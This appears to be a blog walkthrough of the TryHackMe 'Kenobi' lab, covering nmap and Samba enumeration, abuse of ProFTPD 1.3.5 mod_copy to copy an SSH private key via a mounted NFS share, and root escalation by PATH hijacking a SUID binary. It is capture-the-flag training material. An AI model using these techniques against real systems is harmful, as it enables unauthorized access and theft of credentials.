Open in app

Sign in

Write

Sign in

Kenobi

Stacey Landrum
5 min readMar 2, 2023

--

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privileges to root via an SUID binary.

Let’s run a nmap scan

root@ip-10-10-115-20:~# nmap -sC -sV 10.10.86.151

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-02 00:13 GMT
Nmap scan report for ip-10-10-86-151.eu-west-1.compute.internal (10.10.86.151)
Host is up (0.0028s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      50987/udp  mountd
|   100005  1,2,3      51647/tcp  mountd
|   100021  1,3,4      43729/udp  nlockmgr
|   100021  1,3,4      44779/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:97:9E:21:9A:33 (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-03-01T18:13:45-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-02 00:13:45
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

We can use nmap to enumerate SMB. We find 3 shares.

We can also use smbclient to find the same shares.

Let’s see what files we can find.

Log.txt discusses a RSA key and mentions a user named kenobi.

What mounts can we see? We see the volume /var.

Let’s connect to ProFtpd to find the version. We can easily copy files from the server to our machine using the mod_copy module.

We can find the exploits available using searchsploit.

We need to get the SSH key so let’s mount the /var/tmp directory to our machine.

mkdir /mnt/kenobiNFS
sudo mount 10.10.86.151:/var /mnt/kenobiNFS

Let’s list the files.

Copy the RSA key to our machine.

Change the permissions.

chmod 600 id_rsa

Now that we have the private key we can login as kenobi via SSH.

Let’s look for the flag.

Privilege Escalation with Path Variable Manipulation

SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.

Usually I use sudo -l to look to escalate privileges but we don’t have kenobi’s password.

Instead we search for files that we can run as root.

Let’s run some of the unknown binaries.

We can use strings to see what the program is running. We see that /menu is not using full paths for curl, uname, ifconfig so we can try path hijacking.

We can edit the path variable and insert /tmp so that the binary looks there first.

We can insert the shell into curl so that we can execute it from the /tmp folder. We need to make curl executable.

Now when we run the menu binary we get a shell. We are now root and we can get the flag.

We could look for other ways to gain access. Since we have a web app we can visit the site.

Nothing to see there. Always check robots.txt.

I guess they didn’t want us to waste our time here LOL!

Cybersecurity
Tryhackme Walkthrough
Smb
Proftpd
Privilege Escalation

--

--

Stacey Landrum

Written by Stacey Landrum

16 Followers

Cybersecurity analyst with a CySA+ certification and a background in accounting. Passionate about protecting digital assets & staying ahead of emerging threats.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams